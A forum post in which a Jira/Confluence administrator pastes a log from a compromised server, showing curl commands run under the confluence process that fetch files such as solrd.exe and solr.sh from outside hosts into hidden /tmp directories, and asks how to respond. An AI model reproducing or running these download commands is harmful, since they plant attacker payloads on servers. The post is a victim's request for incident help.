Hello. How i can check safety of my Jira server?
Today server go offline. When i restart server i found strange file hackdwl with code in /tmp dir, please see:
CURL: -fsSL http://[redactedAddress1]:8080/docs/s/config.json -o /tmp/.solr/config.json
PPID=19939
bash,19939,confluence /tmp/.java
`-bash,20436 /tmp/.java
`-pstree,20438 -l -p -c -a -u 19939
-----------------------------
CURL: -fsSL http://[redactedAddress2]:2143/auth/solrd.exe -o /tmp/.solr/solrd
PPID=19939
bash,19939,confluence /tmp/.java
`-bash,20442 /tmp/.java
`-pstree,20443 -l -p -c -a -u 19939
-----------------------------
CURL: -fsSL http://[redactedAddress1]:8080/docs/s/solr.sh -o /tmp/.solr/solr.sh
PPID=19939
bash,19939,confluence /tmp/.java
`-bash,20453 /tmp/.java
`-pstree,20454 -l -p -c -a -u 19939
-----------------------------
CURL: -fsSL http://[redactedAddress1]:8080/docs/s/asd.txt -o /tmp/.solrx
PPID=1879
java,1879,confluence -Djava.util.logging.config.file=/opt/atlassian/confluence/conf/logging.properties-Djava.uti
|-bash,23156 -c curl\040-fsSL\040http://[redactedAddress1]:8080/docs/s/asd.txt\ 040-o\040/tmp/.solrx
| `-pstree,23163 -l -p -c -a -u 1879
|-java,2304 -classpath/opt/atlassian/confluence/temp/synchrony-standalone6213138649977042231.jar:/opt/at
| |-{java},2305
| |-{java},2308
| |-{java},2309
| |-{java},2310
| |-{java},2311
| |-{java},2313
| |-{java},2314
| |-{java},2315
| |-{java},2316
| |-{java},2317
| |-{java},2319
.....
Also i find 2 new files liblz4-java.....so and libnetty-transport....so in /tmp dir.
What do I need to do?
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.